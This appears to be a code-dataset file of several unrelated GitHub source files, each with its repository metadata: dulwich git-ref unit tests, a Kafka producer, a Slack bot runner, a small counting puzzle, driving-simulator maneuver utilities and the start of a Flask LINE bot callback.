for ref in self._refs.get_packed_refs()})\n\n self.assertEqual({}, self._refs.get_packed_refs())\n\n # remove the packed ref file, and check that adding nothing doesn't affect that\n os.remove(packed_refs_file_path)\n\n # adding nothing doesn't make it reappear\n self._refs.add_packed_refs({})\n\n self.assertFalse(os.path.exists(packed_refs_file_path))\n\n def test_setitem_symbolic(self):\n ones = b\"1\" * 40\n self._refs[b\"HEAD\"] = ones\n self.assertEqual(ones, self._refs[b\"HEAD\"])\n\n # ensure HEAD was not modified\n f = open(os.path.join(self._refs.path, b\"HEAD\"), \"rb\")\n v = next(iter(f)).rstrip(b\"\\n\\r\")\n f.close()\n self.assertEqual(b\"ref: refs/heads/master\", v)\n\n # ensure the symbolic link was written through\n f = open(os.path.join(self._refs.path, b\"refs\", b\"heads\", b\"master\"), \"rb\")\n self.assertEqual(ones, f.read()[:40])\n f.close()\n\n def test_set_if_equals(self):\n RefsContainerTests.test_set_if_equals(self)\n\n # ensure symref was followed\n self.assertEqual(b\"9\" * 40, self._refs[b\"refs/heads/master\"])\n\n # ensure lockfile was deleted\n self.assertFalse(\n os.path.exists(\n os.path.join(self._refs.path, b\"refs\", b\"heads\", b\"master.lock\")\n )\n )\n self.assertFalse(os.path.exists(os.path.join(self._refs.path, b\"HEAD.lock\")))\n\n def test_add_if_new_packed(self):\n # don't overwrite packed ref\n self.assertFalse(self._refs.add_if_new(b\"refs/tags/refs-0.1\", b\"9\" * 40))\n self.assertEqual(\n b\"df6800012397fb85c56e7418dd4eb9405dee075c\",\n self._refs[b\"refs/tags/refs-0.1\"],\n )\n\n def test_add_if_new_symbolic(self):\n # Use an empty repo instead of the default.\n repo_dir = os.path.join(tempfile.mkdtemp(), \"test\")\n os.makedirs(repo_dir)\n repo = Repo.init(repo_dir)\n self.addCleanup(tear_down_repo, repo)\n refs = repo.refs\n\n nines = b\"9\" * 40\n self.assertEqual(b\"ref: refs/heads/master\", refs.read_ref(b\"HEAD\"))\n self.assertNotIn(b\"refs/heads/master\", refs)\n self.assertTrue(refs.add_if_new(b\"HEAD\", nines))\n self.assertEqual(b\"ref: refs/heads/master\", refs.read_ref(b\"HEAD\"))\n 
self.assertEqual(nines, refs[b\"HEAD\"])\n self.assertEqual(nines, refs[b\"refs/heads/master\"])\n self.assertFalse(refs.add_if_new(b\"HEAD\", b\"1\" * 40))\n self.assertEqual(nines, refs[b\"HEAD\"])\n self.assertEqual(nines, refs[b\"refs/heads/master\"])\n\n def test_follow(self):\n self.assertEqual(\n (\n [b\"HEAD\", b\"refs/heads/master\"],\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n ),\n self._refs.follow(b\"HEAD\"),\n )\n self.assertEqual(\n (\n [b\"refs/heads/master\"],\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n ),\n self._refs.follow(b\"refs/heads/master\"),\n )\n self.assertRaises(SymrefLoop, self._refs.follow, b\"refs/heads/loop\")\n\n def test_set_overwrite_loop(self):\n self.assertRaises(SymrefLoop, self._refs.follow, b\"refs/heads/loop\")\n self._refs[b'refs/heads/loop'] = (\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\")\n self.assertEqual(\n ([b'refs/heads/loop'], b'42d06bd4b77fed026b154d16493e5deab78f02ec'),\n self._refs.follow(b\"refs/heads/loop\"))\n\n def test_delitem(self):\n RefsContainerTests.test_delitem(self)\n ref_file = os.path.join(self._refs.path, b\"refs\", b\"heads\", b\"master\")\n self.assertFalse(os.path.exists(ref_file))\n self.assertNotIn(b\"refs/heads/master\", self._refs.get_packed_refs())\n\n def test_delitem_symbolic(self):\n self.assertEqual(b\"ref: refs/heads/master\", self._refs.read_loose_ref(b\"HEAD\"))\n del self._refs[b\"HEAD\"]\n self.assertRaises(KeyError, lambda: self._refs[b\"HEAD\"])\n self.assertEqual(\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n self._refs[b\"refs/heads/master\"],\n )\n self.assertFalse(os.path.exists(os.path.join(self._refs.path, b\"HEAD\")))\n\n def test_remove_if_equals_symref(self):\n # HEAD is a symref, so shouldn't equal its dereferenced value\n self.assertFalse(\n self._refs.remove_if_equals(\n b\"HEAD\", b\"42d06bd4b77fed026b154d16493e5deab78f02ec\"\n )\n )\n self.assertTrue(\n self._refs.remove_if_equals(\n b\"refs/heads/master\",\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n )\n )\n self.assertRaises(KeyError, lambda: self._refs[b\"refs/heads/master\"])\n\n # HEAD is now a broken symref\n self.assertRaises(KeyError, lambda: self._refs[b\"HEAD\"])\n self.assertEqual(b\"ref: refs/heads/master\", self._refs.read_loose_ref(b\"HEAD\"))\n\n self.assertFalse(\n os.path.exists(\n os.path.join(self._refs.path, b\"refs\", b\"heads\", b\"master.lock\")\n )\n )\n self.assertFalse(os.path.exists(os.path.join(self._refs.path, b\"HEAD.lock\")))\n\n def test_remove_packed_without_peeled(self):\n refs_file = os.path.join(self._repo.path, \"packed-refs\")\n f = GitFile(refs_file)\n refs_data = f.read()\n f.close()\n f = GitFile(refs_file, \"wb\")\n f.write(\n b\"\\n\".join(\n line\n for line in refs_data.split(b\"\\n\")\n if not line or line[0] not in b\"#^\"\n )\n )\n f.close()\n self._repo = Repo(self._repo.path)\n refs = self._repo.refs\n self.assertTrue(\n refs.remove_if_equals(\n b\"refs/heads/packed\",\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n )\n )\n\n def test_remove_if_equals_packed(self):\n # test removing ref that is only packed\n self.assertEqual(\n b\"df6800012397fb85c56e7418dd4eb9405dee075c\",\n self._refs[b\"refs/tags/refs-0.1\"],\n )\n self.assertTrue(\n self._refs.remove_if_equals(\n b\"refs/tags/refs-0.1\",\n b\"df6800012397fb85c56e7418dd4eb9405dee075c\",\n )\n )\n self.assertRaises(KeyError, lambda: self._refs[b\"refs/tags/refs-0.1\"])\n\n def test_remove_parent(self):\n self._refs[b\"refs/heads/foo/bar\"] = b\"df6800012397fb85c56e7418dd4eb9405dee075c\"\n del 
self._refs[b\"refs/heads/foo/bar\"]\n ref_file = os.path.join(\n self._refs.path,\n b\"refs\",\n b\"heads\",\n b\"foo\",\n b\"bar\",\n )\n self.assertFalse(os.path.exists(ref_file))\n ref_file = os.path.join(self._refs.path, b\"refs\", b\"heads\", b\"foo\")\n self.assertFalse(os.path.exists(ref_file))\n ref_file = os.path.join(self._refs.path, b\"refs\", b\"heads\")\n self.assertTrue(os.path.exists(ref_file))\n self._refs[b\"refs/heads/foo\"] = b\"df6800012397fb85c56e7418dd4eb9405dee075c\"\n\n def test_read_ref(self):\n self.assertEqual(b\"ref: refs/heads/master\", self._refs.read_ref(b\"HEAD\"))\n self.assertEqual(\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n self._refs.read_ref(b\"refs/heads/packed\"),\n )\n self.assertEqual(None, self._refs.read_ref(b\"nonexistent\"))\n\n def test_read_loose_ref(self):\n self._refs[b\"refs/heads/foo\"] = b\"df6800012397fb85c56e7418dd4eb9405dee075c\"\n\n self.assertEqual(None, self._refs.read_ref(b\"refs/heads/foo/bar\"))\n\n def test_non_ascii(self):\n try:\n encoded_ref = os.fsencode(\"refs/tags/schön\")\n except UnicodeEncodeError as exc:\n raise SkipTest(\n \"filesystem encoding doesn't support special character\"\n ) from exc\n p = os.path.join(os.fsencode(self._repo.path), encoded_ref)\n with open(p, \"w\") as f:\n f.write(\"00\" * 20)\n\n expected_refs = dict(_TEST_REFS)\n expected_refs[encoded_ref] = b\"00\" * 20\n del expected_refs[b\"refs/heads/loop\"]\n\n self.assertEqual(expected_refs, self._repo.get_refs())\n\n def test_cyrillic(self):\n if sys.platform in (\"darwin\", \"win32\"):\n raise SkipTest(\"filesystem encoding doesn't support arbitrary bytes\")\n # reported in https://github.com/dulwich/dulwich/issues/608\n name = b\"\\xcd\\xee\\xe2\\xe0\\xff\\xe2\\xe5\\xf2\\xea\\xe01\"\n encoded_ref = b\"refs/heads/\" + name\n with open(os.path.join(os.fsencode(self._repo.path), encoded_ref), \"w\") as f:\n f.write(\"00\" * 20)\n\n expected_refs = set(_TEST_REFS.keys())\n expected_refs.add(encoded_ref)\n\n self.assertEqual(expected_refs, set(self._repo.refs.allkeys()))\n self.assertEqual(\n {r[len(b\"refs/\") :] for r in expected_refs if r.startswith(b\"refs/\")},\n set(self._repo.refs.subkeys(b\"refs/\")),\n )\n expected_refs.remove(b\"refs/heads/loop\")\n expected_refs.add(b\"HEAD\")\n self.assertEqual(expected_refs, set(self._repo.get_refs().keys()))\n\n\n_TEST_REFS_SERIALIZED = (\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\\t\"\n b\"refs/heads/40-char-ref-aaaaaaaaaaaaaaaaaa\\n\"\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\\trefs/heads/master\\n\"\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\\trefs/heads/packed\\n\"\n b\"df6800012397fb85c56e7418dd4eb9405dee075c\\trefs/tags/refs-0.1\\n\"\n b\"3ec9c43c84ff242e3ef4a9fc5bc111fd780a76a8\\trefs/tags/refs-0.2\\n\"\n)\n\n\nclass InfoRefsContainerTests(TestCase):\n def test_invalid_refname(self):\n text = _TEST_REFS_SERIALIZED + b\"00\" * 20 + b\"\\trefs/stash\\n\"\n refs = InfoRefsContainer(BytesIO(text))\n expected_refs = dict(_TEST_REFS)\n del expected_refs[b\"HEAD\"]\n expected_refs[b\"refs/stash\"] = b\"00\" * 20\n del expected_refs[b\"refs/heads/loop\"]\n self.assertEqual(expected_refs, refs.as_dict())\n\n def test_keys(self):\n refs = InfoRefsContainer(BytesIO(_TEST_REFS_SERIALIZED))\n actual_keys = set(refs.keys())\n self.assertEqual(set(refs.allkeys()), actual_keys)\n expected_refs = dict(_TEST_REFS)\n del expected_refs[b\"HEAD\"]\n del expected_refs[b\"refs/heads/loop\"]\n self.assertEqual(set(expected_refs.keys()), actual_keys)\n\n actual_keys = refs.keys(b\"refs/heads\")\n 
actual_keys.discard(b\"loop\")\n self.assertEqual(\n [b\"40-char-ref-aaaaaaaaaaaaaaaaaa\", b\"master\", b\"packed\"],\n sorted(actual_keys),\n )\n self.assertEqual([b\"refs-0.1\", b\"refs-0.2\"], sorted(refs.keys(b\"refs/tags\")))\n\n def test_as_dict(self):\n refs = InfoRefsContainer(BytesIO(_TEST_REFS_SERIALIZED))\n # refs/heads/loop does not show up even if it exists\n expected_refs = dict(_TEST_REFS)\n del expected_refs[b\"HEAD\"]\n del expected_refs[b\"refs/heads/loop\"]\n self.assertEqual(expected_refs, refs.as_dict())\n\n def test_contains(self):\n refs = InfoRefsContainer(BytesIO(_TEST_REFS_SERIALIZED))\n self.assertIn(b\"refs/heads/master\", refs)\n self.assertNotIn(b\"refs/heads/bar\", refs)\n\n def test_get_peeled(self):\n refs = InfoRefsContainer(BytesIO(_TEST_REFS_SERIALIZED))\n # refs/heads/loop does not show up even if it exists\n self.assertEqual(\n _TEST_REFS[b\"refs/heads/master\"],\n refs.get_peeled(b\"refs/heads/master\"),\n )\n\n\nclass ParseSymrefValueTests(TestCase):\n def test_valid(self):\n self.assertEqual(b\"refs/heads/foo\", parse_symref_value(b\"ref: refs/heads/foo\"))\n\n def test_invalid(self):\n self.assertRaises(ValueError, parse_symref_value, b\"foobar\")\n\n\nclass StripPeeledRefsTests(TestCase):\n\n all_refs = {\n b\"refs/heads/master\": b\"8843d7f92416211de9ebb963ff4ce28125932878\",\n b\"refs/heads/testing\": b\"186a005b134d8639a58b6731c7c1ea821a6eedba\",\n b\"refs/tags/1.0.0\": b\"a93db4b0360cc635a2b93675010bac8d101f73f0\",\n b\"refs/tags/1.0.0^{}\": b\"a93db4b0360cc635a2b93675010bac8d101f73f0\",\n b\"refs/tags/2.0.0\": b\"0749936d0956c661ac8f8d3483774509c165f89e\",\n b\"refs/tags/2.0.0^{}\": b\"0749936d0956c661ac8f8d3483774509c165f89e\",\n }\n non_peeled_refs = {\n b\"refs/heads/master\": b\"8843d7f92416211de9ebb963ff4ce28125932878\",\n b\"refs/heads/testing\": b\"186a005b134d8639a58b6731c7c1ea821a6eedba\",\n b\"refs/tags/1.0.0\": b\"a93db4b0360cc635a2b93675010bac8d101f73f0\",\n b\"refs/tags/2.0.0\": b\"0749936d0956c661ac8f8d3483774509c165f89e\",\n }\n\n def test_strip_peeled_refs(self):\n # Simple check of two dicts\n self.assertEqual(strip_peeled_refs(self.all_refs), self.non_peeled_refs)\n","repo_name":"jelmer/dulwich","sub_path":"dulwich/tests/test_refs.py","file_name":"test_refs.py","file_ext":"py","file_size_in_byte":29254,"program_lang":"python","lang":"en","doc_type":"code","stars":1962,"dataset":"github-code","pt":"68"} +{"seq_id":"27776557109","text":"from kafka import KafkaProducer \nfrom json import dumps \n\n\nproducer=KafkaProducer(acks=0, #메시지 받은 사람이 메시지를 잘 받았는지 체크하는 옵션 (0은 그냥 보내기만 한다. 확인x)\n compression_type='gzip', #메시지 전달할 때 압축\n bootstrap_servers=['localhost:9092'], #전달하고자하는 카프카 브로커의 위치\n value_serializer=lambda x: dumps(x).encode('utf-8') #직렬화 : 데이터 전송을 위해 byte단위로 바꿔주는 작업 : \n #dumps 함수이용. dump : json 값을 메모리에 올려준다. 
encode를 통해서 올린다.\n #x가 있으면, x를 dumps로 바꾸고 encode 한다.\n )\n\nfor i in range(10): #10개의 값을 \n data={'name':'Dowon-'+str(i)}\n producer.send('test-2021-09-05',value=data)\n producer.flush() # 비우는 작업.\n\nprint(\"DONE\")\n","repo_name":"jenny5587/Kafka","sub_path":"kafka/producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"38988625058","text":"# -*- coding: utf-8 -*-\n# @Author: Tasdik Rahman \n# @http://tasdikrahman.me\n\n\"\"\"\nStiches everything together to make Bumblebee work\n\"\"\"\n\nimport time\n\nfrom slackclient import SlackClient\n\nfrom bumblebee.constants import SLACK_TOKEN, READ_WEBSOCKET_DELAY\nfrom bumblebee.exceptions import SlackClientErorr\nfrom bumblebee.helpers.general_helpers import parse_slack_output, handle_command\n\n\n# instantiate Slack client\ntry:\n slack_client = SlackClient(SLACK_TOKEN)\nexcept Exception:\n raise SlackClientErorr(\"Invalid SLACK API TOKEN\")\n\n\ndef runner():\n if slack_client.rtm_connect():\n print(\"StarterBot connected and running!\")\n while True:\n command, channel = parse_slack_output(slack_client.rtm_read())\n if command and channel:\n handle_command(slack_client, command, channel)\n time.sleep(READ_WEBSOCKET_DELAY)\n else:\n print(\"Connection failed. Invalid Slack token or bot ID?\")\n","repo_name":"wingify/bumblebee","sub_path":"bumblebee/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"33171424791","text":"import sys\n\nn = int(sys.stdin.readline())\n\nk = 1\ncount = 0\nsum = 0\nwhile True:\n if sum == n:\n break\n if sum + k > n:\n k = 1\n sum += k\n else:\n sum += k\n k += 1\n count += 1\n\nprint(count)","repo_name":"parkmingue00/AlgoPractice","sub_path":"Python/1568_새.py","file_name":"1568_새.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"10253700674","text":"#!/usr/bin/env python3\n#rqueiroz@uwaterloo.ca\n#d43sharm@uwaterloo.ca\n# ---------------------------------------------\n# Util functions for decision-making in the frenet frame.\n# --------------------------------------------\n\n\nfrom sv.ManeuverConfig import *\nfrom SimConfig import *\nimport numpy as np\nfrom Actor import *\nimport glog as log\nfrom sv.SDVTrafficState import TrafficState\n\n\n\ndef lane_swerve_completed(vehicle_state, lane_config:LaneConfig, mconfig:MLaneSwerveConfig):\n current_lane = None\n if mconfig.target_lid == 1: # left\n # check if right border of vehicle has crossed right border of lane\n current_lane = lane_config.get_current_lane(vehicle_state.d - VEHICLE_RADIUS)\n elif mconfig.target_lid == -1: # right\n current_lane = lane_config.get_current_lane(vehicle_state.d + VEHICLE_RADIUS)\n else: # target_lid is None or 0\n log.warn(\"WARNING: Lane swerve completed into target_lid {}\".format(mconfig.target_lid))\n current_lane = lane_config\n\n return current_lane.id == mconfig.target_lid\n\ndef cutin_completed(vehicle_state, lane_config:LaneConfig, mconfig:MCutInConfig, traffic_vehicles):\n target_lane_config = lane_config.get_current_lane(traffic_vehicles[mconfig.target_vid].state.d)\n if not target_lane_config:\n log.warn(\"Target vehicle {} is not in an adjacent lane\".format(mconfig.target_vid))\n return None, None\n\n # To start logging when in other lane (for experiments)\n 
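For context on the producer record above, here is a matching consumer sketch with kafka-python; the topic and broker address mirror the producer, everything else is illustrative:

```python
# Hypothetical consumer counterpart to the producer above (same topic/broker).
from kafka import KafkaConsumer
from json import loads

consumer = KafkaConsumer(
    'test-2021-09-05',
    bootstrap_servers=['localhost:9092'],
    auto_offset_reset='earliest',                           # start from the oldest offset
    value_deserializer=lambda x: loads(x.decode('utf-8')),  # inverse of the producer's serializer
)
for message in consumer:
    print(message.value)                                    # e.g. {'name': 'Dowon-0'}
```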
if lane_swerve_completed(vehicle_state, lane_config, MLaneSwerveConfig(target_lid=target_lane_config.id)):\n state_str = (\n \"Cutter:\\n\"\n \" position s={:.3f} sim=({:.3f},{:.3f})\\n\"\n \" speed {:.3f}\\n\"\n ).format(\n vehicle_state.s,\n vehicle_state.x, vehicle_state.y,\n vehicle_state.s_vel\n )\n for vid, tvehicle in traffic_vehicles.items():\n state_str += (\n \"VID {}:\\n\"\n \" position {:.3f}\\n\"\n \" speed {:.3f}\\n\"\n \" delta dist {:.3f}\\n\"\n \" delta vel {:.3f}\\n\"\n ).format(\n vid,\n tvehicle.state.s,\n tvehicle.state.s_vel,\n vehicle_state.s - tvehicle.state.s - 2*VEHICLE_RADIUS,\n vehicle_state.s_vel - tvehicle.state.s_vel\n )\n log.info(state_str)\n log.warn(\"WARNING: Lane swerve completed into target_lid {}\".format(mconfig.target_lid))\n return True\n\n # return lane_swerve_completed(vehicle_state, lane_config, MLaneSwerveConfig(target_lid=target_lane_config.id))\n # Returning false for the experiments\n return False\n # NOTE: this error checking doesn't work cause the goal_state like I defined is wrong, it should be\n # vehicle.future_state(t) where t was used to generate its trajectory. but we don't know\n # what t was used in the planning step here.\n # measure diff in target s and s_vel\n # target_vehicle_state = traffic_vehicles[mconfig.target_vid].vehicle_state\n # delta = np.array([mconfig.delta_s[0], mconfig.delta_d[0], mconfig.delta_s[1]])\n # goal_state = np.array([target_vehicle_state.s, target_vehicle_state.d, target_vehicle_state.s_vel]) + delta\n # cur_state = np.array([\n # vehicle_state.s,\n # vehicle_state.d,\n # vehicle_state.s_vel\n # ])\n\n # log.info(\"target: \" + str(goal_state))\n # log.info(\"cur: \" + str(cur_state))\n # log.info(\"target delta {}\".format(cur_state - goal_state))\n # just try ending on delta d diff and some vel o\n # err_vector = (cur_state - goal_state) / goal_state\n # print(\"err: \" + str(err_vector))\n # return abs(err_vector[1]) < 0.1 and abs(err_vector[0]) < 0.1 and abs(err_vector[2]) < 0.1\n\n\ndef lane_swerve_or_cutin_completed(vehicle_state, lane_config:LaneConfig, mconfig:MConfig, traffic_vehicles):\n if type(mconfig) == MLaneSwerveConfig:\n return lane_swerve_completed(vehicle_state, lane_config, mconfig)\n elif type(mconfig) == MCutInConfig:\n return cutin_completed(vehicle_state, lane_config, mconfig, traffic_vehicles)\n return False\n\ndef can_perform_lane_change():\n return True\n\n# no way of knowing if passed goal\n# def has_reached_goal(vehicle_state, goal_point, threshold=2):\n# to_goal = np.array(goal_point) - np.array([vehicle_state.x, vehicle_state.y])\n# sqr_distance = np.dot(to_goal, to_goal)\n# return sqr_distance < threshold*threshold\n\n#def has_reached_goal_frenet(vehicle_state, goal_point, threshold=2):\n# return False if not goal_point else goal_point[0] - vehicle_state.s < threshold\n\ndef has_reached_goal_frenet(vehicle_state, frenet_goal_point, route_complete, threshold=20, reverse=False):\n \"\"\" Checks if the vehicle has reached or passed the goal point in the frenet frame.\n @param frenet_goal_point: Arraylike (s,d) goal position in the vehicle's frenet frame\n \"\"\"\n if frenet_goal_point is None:\n return False\n\n # TODO: remove reverse from goal condition; all vehicles' goals will be the\n # last point in their route\n # goal_s = 0 if reverse else frenet_goal_point[0]\n # direction = -1 if reverse else 1\n goal_s = frenet_goal_point[0]\n\n # A distance to goal with the same sign as direction means we've reached and passed it\n # return direction * (goal_s - vehicle_state.s) < 
threshold\n # The vehicle has completed its route and has reached or passed its goal\n return route_complete and (goal_s - vehicle_state.s < threshold)\n\ndef is_in_following_range(self_id, vehicle_state, other_vehicles, lane_config:LaneConfig, time_gap=5, distance_gap=30):\n \"\"\" Determines whether there is a vehicle in front of a given vehicle in the same lane and within a specified\n time or distance gap.\n @param time_gap: The time gap below which a vehicle is considered to be following a leading vehicle.\n @param distance_gap: The distance at which a vehicle is considered to be following a leading vehicle,\n regardless of the time gap to the leading vehicle. This should be around the stopping\n distance of SVs.\n \"\"\"\n log.check_notnone(lane_config)\n\n is_following = False\n leading_vid = None\n\n leading_vehicle = get_leading_vehicle(vehicle_state, lane_config, other_vehicles)\n\n if leading_vehicle is not None:\n dist = leading_vehicle.state.s - VEHICLE_RADIUS - vehicle_state.s - VEHICLE_RADIUS\n if dist < 0:\n log.error(\"distance to leading vehicle zero!\")\n\n time_to_leader = dist / vehicle_state.s_vel if vehicle_state.s_vel != 0 else float('inf')\n\n # Enter following range if below threshold for distance gap or time gap.\n if (dist < distance_gap) or (0 <= time_to_leader < time_gap):\n is_following = True\n leading_vid = leading_vehicle.id\n #log.info(\"{} is leading. Distance {}, time gap {}\".format(\n # leading_vehicle.id, dist, time_to_leader))\n\n return is_following, leading_vid\n\ndef is_lane_occupied(vehicle_state, lane_config, traffic_vehicles, threshold=50):\n log.check_notnone(lane_config)\n\n smin = vehicle_state.s - threshold\n smax = vehicle_state.s + threshold\n vehicles_in_lane = list(filter(\n lambda v: smin < v.state.s < smax,\n get_vehicles_in_lane(lane_config, traffic_vehicles)\n ))\n\n return len(vehicles_in_lane) != 0\n\ndef get_vehicles_in_lane(lane_config, traffic_vehicles):\n log.check_notnone(lane_config)\n\n vehicles = []\n for vid, traffic_vehicle in traffic_vehicles.items():\n other_vehicle_lane = lane_config.get_current_lane(traffic_vehicle.state.d)\n if other_vehicle_lane and other_vehicle_lane.id == lane_config.id:\n vehicles.append(traffic_vehicle)\n return vehicles\n\n# same as below, but i didn't wanna touch Ricardo's code. 
TODO clean this up\ndef get_leading_vehicle(vehicle_state, lane_config, traffic_vehicles):\n    \"\"\" Gets closest vehicle in the same lane as vehicle_state.\n    \"\"\"\n    log.check_notnone(lane_config)\n\n    cur_lane = lane_config.get_current_lane(vehicle_state.d)\n    #if cur_lane is None:\n        #print(vehicle_state.d)\n        #print(lane_config)\n    log.check_notnone(cur_lane)\n\n    vehicles_ahead = list(filter(\n        lambda v: v.state.s > vehicle_state.s,\n        get_vehicles_in_lane(cur_lane, traffic_vehicles)\n    ))\n\n    if len(vehicles_ahead) == 0:\n        return None\n\n    return min(vehicles_ahead, key=lambda v: v.state.s)\n\ndef get_closest_vehicle_in_lane(vehicle_state, lane_config, traffic_vehicles):\n    vehicles_in_lane = get_vehicles_in_lane(lane_config, traffic_vehicles)\n    if len(vehicles_in_lane) == 0:\n        return None\n    # compare each vehicle against the subject vehicle (not against itself)\n    return min(vehicles_in_lane, key=lambda v: abs(v.state.s - vehicle_state.s))\n\ndef reached_gap(vehicle_state, target_lane_config, traffic_vehicles, meters):\n    \"\"\" determines whether `vehicle_state` is `meters` ahead of the\n        nearest vehicle in the target lane.\n    \"\"\"\n    target_vehicle = get_closest_vehicle_in_lane(vehicle_state, target_lane_config, traffic_vehicles)\n    if target_vehicle is None:\n        log.warn(\"No target vehicle in {} lane.\".format('LEFT' if target_lane_config.id == 1 else 'RIGHT'))\n        return True\n    gap = range_gap(vehicle_state, target_vehicle)\n    #print(\"GAP\" + str(gap))\n    return gap > meters\n\n#def ttc(self_id, vehicle_state, other_vehicles, lane_config:LaneConfig):\n\ndef range_gap(vehicle_state, target_vehicle):\n    \"\"\"Longitudinal distance between vehicles (front bumper to back bumper) if in the same or parallel lanes.\n    If behind target, gap is negative. If ahead, gap is positive.\n    Gap is zero if there is no distance between vehicle limits.\n    \"\"\"\n    #gap = vehicle_state.s - VEHICLE_RADIUS - (target_vehicle.state.s + VEHICLE_RADIUS)\n    half_length = VEHICLE_LENGTH / 2\n    #ahead, positive or zero\n    if vehicle_state.s > target_vehicle.state.s:\n        #back bumper - target front bumper\n        gap = max((vehicle_state.s - half_length) - (target_vehicle.state.s + half_length), 0)\n    #behind, negative or zero\n    else:\n        #front bumper - target back bumper\n        gap = min((vehicle_state.s + half_length) - (target_vehicle.state.s - half_length), 0)\n    return gap\n\n#Ricardo's implementation:\n\ndef get_vehicle_ahead(vehicle_state, lane_config, vehicles, threshold=4):\n    ''' Analyzes (frenet coordinates) whether there is an adversary vehicle\n        (adversary_vehicle) ahead of the subject vehicle (subject_vehicle)\n        sharing the same lane, within a threshold (frenet s-plane). 
In case\n of multiple vehicles, it returns the closest one.\n @return (vid, sv.SV.Vehicle)'''\n\n subject_vehicle_state = vehicle_state\n s_current_lane = lane_config.get_current_lane(subject_vehicle_state.d)\n dist = float('inf')\n nearest = list()\n for vid, adversary_vehicle in vehicles.items():\n a_current_lane = lane_config.get_current_lane(adversary_vehicle.state.d)\n\n #if they are both in the same lane\n if s_current_lane == a_current_lane:\n # and the adv is ahead of the subj (within the thresh)\n if subject_vehicle_state.s < adversary_vehicle.state.s and adversary_vehicle.state.s < subject_vehicle_state.s + threshold:\n diff = adversary_vehicle.state.s - subject_vehicle_state.s\n if diff < dist:\n dist = diff\n nearest = [vid,adversary_vehicle]\n\n return nearest\n\ndef is_stopped(traffic_vehicle):\n return abs(traffic_vehicle.state.s_vel) < 0.05\n\ndef is_slow_vehicle(subject_vehicle, traffic_vehicle):\n return subject_vehicle.s_vel > traffic_vehicle.state.s_vel\n\ndef reached_acceptance_gap(vehicle_state, lane_config, vehicles, threshold=1):\n ''' Analyzes (frenet coordinates) whether is there an adversary vehicle\n (adversary_vehicle) ahead of subject vehicle (subject_vehicle)\n sharing the same lane, within a threshold (frenet s-plane). In case\n of multiple vehicles, it returns the closest one.\n @return (vid, sv.SV.Vehicle)'''\n\n subject_vehicle_state = vehicle_state\n s_current_lane = lane_config.get_current_lane(subject_vehicle_state.d)\n reached = True\n for vid, adversary_vehicle in vehicles.items():\n adversary_vehicle_state = adversary_vehicle.state\n\n a_current_lane = lane_config.get_current_lane(adversary_vehicle_state.d)\n if (a_current_lane is None or a_current_lane.id - 1 != s_current_lane): continue #makes sure not to compare with irrelevant vehicles (-1 is hardcoded)\n\n if subject_vehicle_state.s - VEHICLE_RADIUS < adversary_vehicle_state.s + VEHICLE_RADIUS + threshold:\n reached = False\n\n return reached\n\ndef has_passed_enough_time(ref_time, curr_time, threshold):\n return ref_time - curr_time > threshold\n\n# TODO\ndef is_gap_reachable(vehicle, traffic_vehicles, gap_size):\n return False\n\n# TODO\ndef was_the_gap_reached(vehicle, traffic_vehicles, gap_size):\n return False\n","repo_name":"rodrigoqueiroz/geoscenarioserver","sub_path":"sv/ManeuverUtils.py","file_name":"ManeuverUtils.py","file_ext":"py","file_size_in_byte":13044,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"68"} +{"seq_id":"30101454100","text":"import re\nimport os\nimport zaim\nfrom datetime import datetime, date,timedelta\nimport logging\n\nfrom flask import Flask, request, abort\n\nfrom linebot import (\n LineBotApi, WebhookHandler\n)\nfrom linebot.exceptions import (\n InvalidSignatureError\n)\nfrom linebot.models import (\n MessageEvent, TextMessage, TextSendMessage,\n)\n\n\n\napplication = Flask(__name__)\nlogging.basicConfig()\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\n\n\nline_bot_api = LineBotApi(os.environ['LineBotApi'])\nhandler = WebhookHandler(os.environ['WebHook'])\n\n@application.route('/', methods=['GET', 'POST'])\ndef lambda_handler(event=None, context=None):\n logger.info('Lambda function invoked index()')\n return 'hello from Flask!'\n\n@application.route(\"/bot/callback\", methods=['POST'])\n\ndef callback():\n # get X-Line-Signature header value\n signature = request.headers['X-Line-Signature']\n\n # get request body as text\n body = request.get_data(as_text=True)\n 
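The maneuver utilities above reduce to simple frenet-frame arithmetic; `range_gap` in particular encodes a sign convention (positive when ahead, negative when behind, zero on overlap). A standalone illustration with stand-in state objects and an assumed vehicle length:

```python
# Sign convention of range_gap, with stand-in objects; VEHICLE_LENGTH is
# assumed to be 4.0 here (the real value comes from SimConfig).
from types import SimpleNamespace

VEHICLE_LENGTH = 4.0
half = VEHICLE_LENGTH / 2

ego = SimpleNamespace(s=30.0)                            # ego longitudinal position
target = SimpleNamespace(state=SimpleNamespace(s=20.0))  # target 10 m behind

# ego ahead of target: ego back bumper minus target front bumper, clamped at 0
gap = max((ego.s - half) - (target.state.s + half), 0)
assert gap == 6.0
```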
